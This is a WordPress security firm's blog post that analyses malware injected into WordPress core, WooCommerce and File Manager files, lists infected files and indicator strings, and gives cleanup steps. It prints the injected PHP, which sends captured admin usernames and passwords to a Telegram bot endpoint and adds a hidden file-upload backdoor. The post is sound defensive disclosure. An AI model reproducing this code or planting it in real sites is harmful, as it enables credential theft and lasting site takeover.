,Fix my WordPress!,WordPress Maintenance,Security,Pricing,
,,
,
,
We have noticed a number of WordPress websites being affected by a new malware which is using the Telegram API to compromise private information (admin username and password) and remotely post it to telegram and store it to a remote database.
Here we can see the malicious code that is being injected:
try{
$bajatax_x9=apply_filters( 'wp_authenticate_user', $user, $password );
if(wp_check_password( $password, $bajatax_x9->user_pass, $bajatax_x9->ID )){
if(!empty($username) and !empty($password)){
$message852="bajatax|:|:|".$username."|:|:|".$password."|:|:|".$_SERVER['REMOTE_ADDR']."|:|:|".$_SERVER['SERVER_NAME'] ."|:|:|";
file_get_contents("https://api.telegram.org/xxxxxxxxx:AAEg61uHS7H7lRnf9jA27cmahncSl8NMuvI/sendMessage?chat_id=1110165405&text=" . urlencode($message852)."" );
}
}
}catch (Exception $e) {
if(function_exists("file_get_contents")){
try{
file_get_contents("https://api.telegram.org/xxxxxxxxx:AAE1-wpQyYquqvB7wOeBzzmPafEp0d81e6c/sendMessage?chat_id=1110165405&text=" . urlencode$
file_get_contents("https://api.telegram.org/xxxxxxxxx:AAE1-wpQyYquqvB7wOeBzzmPafEp0d81e6c/sendMessage?chat_id=1110165405&text=" . urlencode$
}catch (Exception $e2) {}
}
}
try{
if($_POST['action']=="wp_ajax_try_2020_v2"){
if(!empty ($_FILES['file']) and md5(md5(md5($_POST['token_admin'])))=="015c38c46597c483b6186e4a40aad4bf"){
@move_uploaded_file($_FILES['file']['tmp_name'],"../".$_FILES['file']['name']);
echo " file name : ".$_FILES['file']['name'];
}else{
die(0);
}
exit();
}
}catch (Exception $e) {
if(function_exists("file_get_contents")){
try{
file_get_contents("https://api.telegram.org/xxxxxxxx:AAE1-wpQyYquqvB7wOeBzzmPafEp0d81e6c/sendMessage?chat_id=1110165405&text=" . urlencode$
file_get_contents("https://api.telegram.org/xxxxxxxxx:AAE1-wpQyYquqvB7wOeBzzmPafEp0d81e6c/sendMessage?chat_id=1110165405&text=" . urlencode$
}catch (Exception $e2) {}
}
}
The malware looks to be infecting WordPress’ core files, “File Manager” and “WooCommerce” plugins for now, including the latest version of WordPress (5.5) and Woocommerce (4.4.1). The files that seem to be affected are:
- wp-includes/user.php
- wp-admin/admin-ajax.php
- wp-file-manager/lib/files/HhGFXU.php (and other randomly named .php files)
- woocommerce/includes/wc-user-functions.php
- woocommerce/includes/class-wc-form-handler.php
Expressions that can help to determine if your site is compromised are:
“bajatax”“api.telegram.org”
Since the code above is not hashed or obfuscated, it is extremely difficult to be scanned using a security plugin like wordfence or sucuri so manual intervention is advised.
Steps to resolve
Basic steps to resolve this is to replace all the wordpress core files with clean wp-admin and wp-includes folders and a fresh re-install of the woocommerce and wp file manager plugins. Always make sure to take a backup before attempting this.
Also, in no cases there should be any references of those strings anywhere in your website’s files or database (with the exception of when using the official Telegram plugin for the 2nd string).
Lastly, it is recommended to check on newly created WordPress usernames that might be injected into the database as well.
As always, we’re here to help in case you need any assistance with cleaning your website and implementing additional security measures. If your site has been infected, feel free to contact us and we can help ASAP.
Also, make sure to follow us on twitter for future updates. Follow @fixed_net
Panos Kesisis
,
SEO Spam hack - "ac47549"
Sophisticated functions.php hack with multiple layers of encoded payload in the database.
Shopify vs. WordPress: What is the Difference?
Shopify is an eCommerce platform where e-merchants can build and host online stores. WordPress on the other hand is an open-source platform that requires a plugin like WooCommerce to launch an eCommerce store.
How to Set up Private Cloud Storage for Your Business
Private cloud storage provides adequate storage capacity that is easy to manage, billable, scalable, and swiftly provisioned for users.
How to Use MailChimp with WordPress
Use MailChimp to add a signup form, Inline form, and popup form to any page or post on your WordPress website. Read this post to learn how to use MailChimp with WordPress.
,